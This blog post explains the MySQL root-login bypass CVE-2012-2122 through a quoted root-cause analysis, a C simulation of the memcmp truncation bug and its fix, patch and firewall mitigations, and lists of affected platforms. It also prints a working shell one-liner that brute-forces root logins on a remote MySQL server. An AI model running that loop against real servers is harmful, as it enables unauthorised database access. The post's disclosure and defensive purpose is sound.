I'm a programmer specialising in performant and scalable systems using PHP and Ruby and cooking


Published:
On MySQL | Security

Security flaw in MySQL Server (CVE-2012-2122)

I just wanted to bring to people's attention the security flaw in MySQL Server that lets an attacker log in as root without needing to know the password.

As explained in the article CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL by HD Moore, the flaw stems from an incorrect assumption about the value returned by the memcmp() function:

This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.
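To make the quoted explanation concrete, here is an added example (not code from the article and not MySQL's own source) that models the flaw in miniature. It uses a constructed stand-in for an "optimized" memcmp() whose return value is not limited to -127..127, a checker that narrows that int to MySQL's 8-bit my_bool the way the vulnerable comparison did, and the fixed form that collapses the result to 0/1 before the narrowing. fast_memcmp, the xorshift PRNG, the counting helpers and all identifiers are constructed for the demonstration; the program counts how often each checker accepts a wrong scramble.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;   /* MySQL's my_bool is a plain char: 8 bits wide */

/* Constructed stand-in for an "optimized" memcmp. It compares 32-bit words
 * and returns the arithmetic difference of the first word that differs, so
 * the result is frequently far outside -127..127. The C standard only fixes
 * the sign of memcmp's result, so this is a legal implementation. It is not
 * glibc's code; it only reproduces the behaviour the article describes. */
static int fast_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *pa = a;
    const unsigned char *pb = b;
    size_t i = 0;

    for (; i + 4 <= n; i += 4) {
        uint32_t wa, wb;
        memcpy(&wa, pa + i, sizeof wa);
        memcpy(&wb, pb + i, sizeof wb);
        if (wa != wb)
            return (int)(wa - wb);      /* non-zero, but of any magnitude */
    }
    for (; i < n; i++)
        if (pa[i] != pb[i])
            return (int)pa[i] - (int)pb[i];
    return 0;
}

/* Vulnerable shape: the int from memcmp is narrowed to an 8-bit my_bool.
 * A result such as 256 or -512 has a zero low byte, so it becomes 0, which
 * the caller reads as "the scrambles match". Compilers do not warn here. */
static my_bool check_scramble_vulnerable(const uint8_t *expected,
                                         const uint8_t *received)
{
    int diff = fast_memcmp(expected, received, SHA1_HASH_SIZE);
    return (my_bool)diff;               /* the bug: silent truncation */
}

/* Fixed shape: collapse the int to 0 or 1 before it is narrowed. */
static my_bool check_scramble_fixed(const uint8_t *expected,
                                    const uint8_t *received)
{
    return fast_memcmp(expected, received, SHA1_HASH_SIZE) != 0;
}

typedef my_bool (*scramble_check_fn)(const uint8_t *, const uint8_t *);

/* Small deterministic PRNG so the experiment is reproducible offline. */
static uint32_t xorshift32(uint32_t *state)
{
    uint32_t x = *state;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    return *state = x;
}

static void fill_random(uint8_t *buf, uint32_t *state)
{
    for (size_t i = 0; i < SHA1_HASH_SIZE; i++)
        buf[i] = (uint8_t)(xorshift32(state) & 0xff);
}

/* Feed `trials` wrong scrambles to a checker and count how many it accepts.
 * As in MySQL's caller, a return value of 0 means "match". */
static unsigned count_false_accepts(scramble_check_fn check, unsigned trials)
{
    uint8_t expected[SHA1_HASH_SIZE], received[SHA1_HASH_SIZE];
    uint32_t state = 0x20122122u;       /* constructed seed */
    unsigned accepted = 0;

    fill_random(expected, &state);
    for (unsigned t = 0; t < trials; t++) {
        fill_random(received, &state);
        if (memcmp(expected, received, SHA1_HASH_SIZE) == 0)
            continue;                   /* a genuine match is not a false accept */
        if (check(expected, received) == 0)
            accepted++;
    }
    return accepted;
}

/* Sanity check: the checker must still accept the correct scramble. */
static int accepts_correct(scramble_check_fn check)
{
    uint8_t expected[SHA1_HASH_SIZE];
    uint32_t state = 0x20122122u;
    fill_random(expected, &state);
    return check(expected, expected) == 0;
}

int main(void)
{
    const unsigned trials = 100000;
    printf("vulnerable: %u of %u wrong scrambles accepted (about 1 in 256 expected)\n",
           count_false_accepts(check_scramble_vulnerable, trials), trials);
    printf("fixed:      %u of %u wrong scrambles accepted\n",
           count_false_accepts(check_scramble_fixed, trials), trials);
    return 0;
}
```

Build it with `cc -o memcmp_demo memcmp_demo.c && ./memcmp_demo`: the vulnerable checker accepts roughly one wrong scramble in 256, the fixed one accepts none, and both still accept the correct scramble. The lesson is the narrowing, not the specific libc: any int-returning comparison stored in a char or bool-sized type needs an explicit `!= 0` (or a comparison that yields only 0/1) before the result is returned.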

This makes the root login trivial to brute force; the article gives this one-liner, which just retries until one attempt is accepted (on average around 256 tries):

# each attempt has roughly a 1-in-256 chance of being accepted; the first
# attempt that succeeds drops you into the mysql shell on the remote server
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 10.2.11.201 2>/dev/null; done

The proper fix is to upgrade to a build that contains the patch (fixed upstream in MySQL 5.1.63 and 5.5.24, or the corresponding distribution packages). Until then, the simplest mitigation is to ensure that your MySQL server is only reachable from trusted hosts (for example by binding it to 127.0.0.1 with bind-address, or firewalling port 3306) and to harden the server itself. Note that this only narrows who can reach the server: any host that can still connect to the port and matches an account's host grant can use the attack. In our case our database servers are hosted separately from our application servers and so are only accessible from the local network.

The following lists have been taken from the article purely to be helpful:

So far, the following systems have been confirmed as vulnerable:

- Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04) (via many including @michealc)
- OpenSuSE 12.1 64-bit MySQL 5.5.23-log (via @michealc)
- Debian Unstable 64-bit 5.5.23-2 (via @derickr)
- Fedora (via hexed and confirmed by Red Hat)
- Arch Linux (unspecified version)

Feedback so far indicates the following platforms are NOT vulnerable:

- Official builds from MySQL and MariaDB (including Windows)
- Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
- CentOS using official RHEL rpms
- Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
- Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
- Debian Linux lenny 32-bit 5.0.51a-24+lenny5 (via @matthewbloch)
- Debian Linux lenny 64-bit 5.0.51a-24+lenny5 (via @matthewbloch)
- Debian Linux lenny 64-bit 5.1.51-1-log (via @matthewbloch)
- Debian Linux squeeze 64-bit 5.1.49-3-log (via @matthewbloch)
- Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 (via @matthewbloch)
- Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 (via @matthewbloch)
- Gentoo 64-bit 5.1.62-r1 (via @twit4c)
- SuSE 9.3 i586 MySQL 4.1.10a (via @twit4c)
- OpenIndiana oi_151a4 5.1.37 (via @TamberP)

You can read the full article here, and I recommend you do for a fuller description of the problem and its defence recommendations.